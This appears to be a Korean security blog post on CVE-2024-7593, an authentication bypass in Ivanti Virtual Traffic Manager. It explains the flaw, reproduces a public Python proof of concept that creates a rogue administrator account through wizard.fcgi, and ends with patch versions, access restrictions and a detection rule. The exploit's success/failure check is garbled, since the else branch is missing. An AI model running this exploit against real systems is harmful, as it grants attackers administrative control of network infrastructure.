1. Ivanti Virtual Traffic Manager (vTM) [1]

- 소프트웨어 기반의 Application Delivery Controller(ADC)
- 로드밸런싱과 애플리케이션 딜리버리 기능을 제공

※ Application Delivery Controller(ADC) [2][3]
> 데이터 센터의 웹 서버 앞에 위치하여 여러 사용자에게 애플리케이션을 안정적이고 효율적으로 제공하기 위한 역할을 수행하는 네트워크 장치


2. 취약점

2.1 CVE-2024-7593 [4]

[사진 1] CVE-2024-7593

- 취약한 Ivanti vTM의 인증 알고리즘 구현 오류에서 비롯되는 인증 우회 취약점 (CVSS:9.8)

> 악용 사례는 없으나 PoC 코드가 공개된 만큼 빠른 조치가 필요

영향받는 버전
vTM ~ 22.2 이하 버전
vTM ~ 22.3 이하 버전
vTM ~ 22.3R2 이하 버전
vTM ~ 22.5R1 이하 버전
vTM ~ 22.6R1 이하 버전
vTM ~ 22.7R1 이하 버전

2.2 PoC [5]

- params 설정
wizard.fcgi의 access control를 우회하기 위해 error 파라미터 1로 설정
계정 생성을 위한 섹션을 로드하기 위해 section 파라미터 설정

※ wizard.fcgi는 웹 인터페이스의 모든 섹션을 로드할 수 있음


- data 설정

CSRF를 우회하기 위해 _form_submitted 필드를 form으로 설정
계정 생성을 의미하는 create_user 필드를 Create로 설정
> 관리자 계정 생성을 위한 추가 정보를 설정해 POST 요청 전송


- 응답 확인

응답 코드가 200이고 응답에 '<title>2<'이 포함된 경우 계정 생성이 정상적으로 수행된 것
> 생성한 계정을 통해 로그인 가능

# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass
# Date: 2024-08-03
# Exploit Author: ohnoisploited
# Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller
# Software Link: https://hubgw.docker.com/r/pulsesecure/vtm
# Version: 9.9
# Tested on: Linux
# Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC 
# Fixed versions: 22.7R2+

import requests

# Set to target address
admin_portal = ''

# User to create
new_admin_name = 'newadmin'
new_admin_password = 'newadmin1234'

session = requests.Session()

# Setting 'error' bypasses access control for wizard.fcgi.
# wizard.fcgi can load any section in the web interface.
params = { 'error': 1,
          'section': 'Access Management:LocalUsers' }

# Create new user request
# _form_submitted to bypass CSRF
data = {  '_form_submitted': 'form',
          'create_user': 'Create',
          'group': 'admin',
          'newusername': new_admin_name,
          'password1': new_admin_password,
          'password2': new_admin_password }

# Post request
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)

# View response
content = r.content.decode('utf-8')

if r.status_code == 200 and '<title>2<' in content:
    print("New user request sent")
    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
    print("Unable to create new user")

3. 대응방안

- 벤더사 제공 업데이트 적용 [6][7]

제품명 영향받는 버전 해결 버전
(Virtual Traffic Manager)
22.2 이하 버전 22.2R1
22.3 이하 버전 22.3R3 (8월 19 ~ 23일 출시 예정)
22.3R2 이하 버전 22.3R3 (8월 19 ~ 23일 출시 예정)
22.5R1 이하 버전 22.5R2 (8월 19 ~ 23일 출시 예정)
22.6R1 이하 버전 22.6R2 (8월 19 ~ 23일 출시 예정)
22.7R1 이하 버전 22.7R2


- 즉각 업데이트 적용이 불가한 경우 [7]

> System > Security > Management IP Address and Admin Server Port > bindip 설정
> 또는, Restricting Access 설정을 이용해 Trusted IP의 접근만 허용하도록 할 수 있음

[사진 2] 권고 사항

- "/apps/zxtm/wizard.fcgi", "error=" 탐지 정책 설정


4. 참고

[1] https://www.ivanti.com/resources/v/doc/ivi/2528/2ef03e8ed03d
[2] https://terms.tta.or.kr/dictionary/dictionaryView.do?word_seq=036033-1
[3] https://ithub.tistory.com/103
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-7593
[5] https://packetstormsecurity.com/files/179906/Ivanti-ADC-9.9-Authentication-Bypass.html
[6] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&pageIndex=1&nttId=71526&menuNo=205020
[7] https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US
[8] https://hackyboiz.github.io/2024/08/17/j0ker/2024-08-17/
[9] https://www.dailysecu.com/news/articleView.html?idxno=158549

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